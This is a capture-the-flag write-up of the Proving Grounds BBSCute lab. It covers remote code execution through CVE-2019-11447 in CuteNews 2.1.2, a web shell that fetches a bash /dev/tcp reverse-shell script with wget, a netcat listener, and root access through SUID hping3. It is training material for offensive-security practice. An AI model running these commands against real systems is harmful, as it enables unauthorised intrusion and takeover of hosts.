Proving Grounds - BBSCute Writeup

June 1, 2026

ctf
linux

The target is compromised via Remote Code Execution (RCE) in CuteNews v2.1.2 through a vulnerable avatar upload feature. Privilege escalation is achieved by abusing SUID permissions on /usr/sbin/hping3, enabling root-level command execution.

This is a walkthrough of the machine BBSCute from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Webapp, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 22 - SSH
  • 80/88 - HTTP
  • 110/995 - POP3

Webapp

Enumerating the web application on port 80 using gobuster, we discover the page /index.php.

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64 -x php,txt

Navigating to /index.php, we discover that CuteNews 2.1.2 is running.

Initial access

CuteNews 2.1.2 is vulnerable to CVE-2019-11447, searching for PoCs, we find this GitHub repository.

We clone the Python script and take a closer look:

wget https://raw.githubusercontent.com/thewhiteh4t/cve-2019-11447/refs/heads/main/cve-2019-11447.py

The script requires a username and password, therefore we have to pivot back to the web application and register an account.

Although after trying to register, we run into a problem - a captcha is required, however it is never displayed:

Looking at the page source of /index.php?register, we find a reference to /captcha.php.

We can navigate to /captcha.php, and use the code from this page to register an account.

/captcha.php (for demonstration purposes, captcha is dynamic...)

With a valid account in hand, we will run the exploit again:

python3 CVE-2019-11447.py http://<IP>/index.php <USERNAME> <PASSWORD>

Now, we have a web shell on the target, which we can use to obtain a reverse shell:

  • Create a shell.sh script
#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

  • Start a web server on our attack box
python3 -m http.server 80

  • Use the web shell to download our script
/uploads/avatar_test_4706.php?cmd=wget http://<IP>/shell.sh -O /tmp/shell.sh

  • Start a netcat listener on our attack box
nc -lvnp <PORT>

  • Use the web shell to execute the script
/uploads/avatar_test_4706.php?cmd=bash /tmp/shell.sh

We receive a shell as www-data, and can read the first local.txt flag.

Privilege escalation

Before proceeding, we need to upgrade our shell first, by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'

You will run into issues if you do not follow this step.

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/sbin/hping3:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running the following, which provides us with a root shell to finally read the second proof.txt flag:

/usr/sbin/hping3

/bin/sh -p

Related Articles
Proving Grounds - Dawn Writeup
May 31, 2026
ctf
linux
This lab demonstrates the exploitation of a misconfigured SMB share and scheduled cron jobs to achieve remote code execution. By uploading malicious files to an open SMB share, the attacker leverages a cron job to execute them. Privilege escalation is accomplished through a misconfigured SUID binary, zsh, which provides root access.
Proving Grounds - FunboxEasyEnum Writeup
May 31, 2026
ctf
linux
Proving Grounds - Monitoring Writeup
May 30, 2026
ctf
linux
In this lab, we exploit an authenticated remote code execution vulnerability in the Nagios XI monitoring software. The application is misconfigured to run with root privileges, allowing us to escalate immediately to root once the vulnerability is exploited.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.